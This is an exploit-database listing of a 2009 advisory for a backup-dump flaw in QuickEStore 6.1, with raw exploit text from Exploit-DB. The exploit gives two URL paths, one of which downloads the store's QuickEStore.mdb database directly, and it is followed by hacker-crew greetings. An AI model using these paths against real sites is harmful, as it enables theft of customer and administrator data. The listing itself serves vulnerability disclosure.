header-logo
Suggest Exploit
vendor:
QuickEStore
by:
indoushka
7,5
CVSS
HIGH
Backup Dump
N/A
CWE
Product Name: QuickEStore
Affected Version From: 6.1
Affected Version To: 6.1
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu)
2009

QuickEStore 6.1 Backup Dump Vulnerability

A vulnerability exists in QuickEStore 6.1 which allows an attacker to dump the backup of the application. This can be done by accessing the QuickEStore.mdb and admin files on the server.

Mitigation:

Ensure that the QuickEStore.mdb and admin files are not accessible to unauthorized users.
Source

Exploit-DB raw data:

========================================================================================                  
| # Title    : QuickEStore 6.1 Backup Dump Vulnerability
| # Author   : indoushka                                                               
| # email    : indoushka@hotmail.com                                                   
| # Home     : www.iqs3cur1ty.com                                                                                 
| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu)       
| # Bug      : Backup Dump                                                                      
======================      Exploit By indoushka       =================================
 # Exploit  : 
 
 1- http://127.0.0.1/quickestore61/QuickEStore.mdb
 
 2- http://127.0.0.1/quickestore61/admin
 
 
Dz-Ghost Team ===== Saoucha * Star08 * Redda * Silitoad * XproratiX * onurozkan * n2n * ========================
Greetz : 
Exploit-db Team : 
(loneferret+Exploits+dookie2000ca)
all my friend :
His0k4 * Hussin-X * Rafik (www.Tinjah.com) * Yashar (www.sc0rpion.ir) SoldierOfAllah (www.m4r0c-s3curity.cc)
Stake (www.v4-team.com) * r1z (www.sec-r1z.com) * D4NB4R http://www.ilegalintrusion.net/foro/
www.securityreason.com * www.sa-hacker.com * Cyb3r IntRue (avengers team) * www.alkrsan.net * www.mormoroth.net
---------------------------------------------------------------------------------------------------------------

Navigation

Suggest Exploit

Services By CQR